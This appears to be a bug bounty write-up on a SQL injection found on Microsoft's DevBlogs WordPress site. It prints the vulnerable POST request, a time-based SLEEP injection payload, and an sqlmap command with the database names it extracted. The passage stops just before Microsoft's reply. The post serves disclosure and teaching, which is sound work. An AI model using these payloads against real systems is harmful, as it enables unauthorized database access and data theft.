SQL Injection Vulnerability in Microsoft’s DevBlogs [devblogs.microsoft.com]

2 min readJan 20, 2025

Hello world

In this write-up, I discuss a SQL injection vulnerability discovered on Microsoft’s DevBlogs website ([https://devblogs.microsoft.com](https://devblogs.microsoft.com)). This type of security flaw allows an attacker to manipulate the website’s database by injecting malicious SQL queries. I explain how the vulnerability was identified and the potential risks it poses.

First, if you open https://devblogs.microsoft.com/ and use a browser extension or any other tool, you can detect that this subdomain uses WordPress CMS as its blogging platform.

Then I tried to find something there, as it was an interesting subdomain for me. By exploring the website and analyzing its requests, I found this specific request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://devblogs.microsoft.com/
Cookie: VALUE
Content-Length: 17894
Accept-Encoding: gzip,deflate,br
User-Agent: NOTROBOT
Host: devblogs.microsoft.com
Connection: Keep-alive
action=load_more_results2&limit=10&offset=10&query=HELLO&search_term=the

After some tests, I discovered that the query parameter was vulnerable to SQL injection, which I confirmed using this payload: (SELECT 4008 FROM (SELECT(SLEEP(5)))LDNk)

I saved the request in a text file and, using this command, was able to extract the database names as a proof of concept (PoC):

sqlmap -r savedreqsql.txt — dbs — force-ssl -p query

The extracted database names were:

[] information_schema
[] performance_schema
[*] wp_devblogs

I continued testing the request and noticed that it was actually vulnerable to error-based SQL injection, which was easier to exploit than the time-based one.

After I reported it to the Microsoft team, their response was: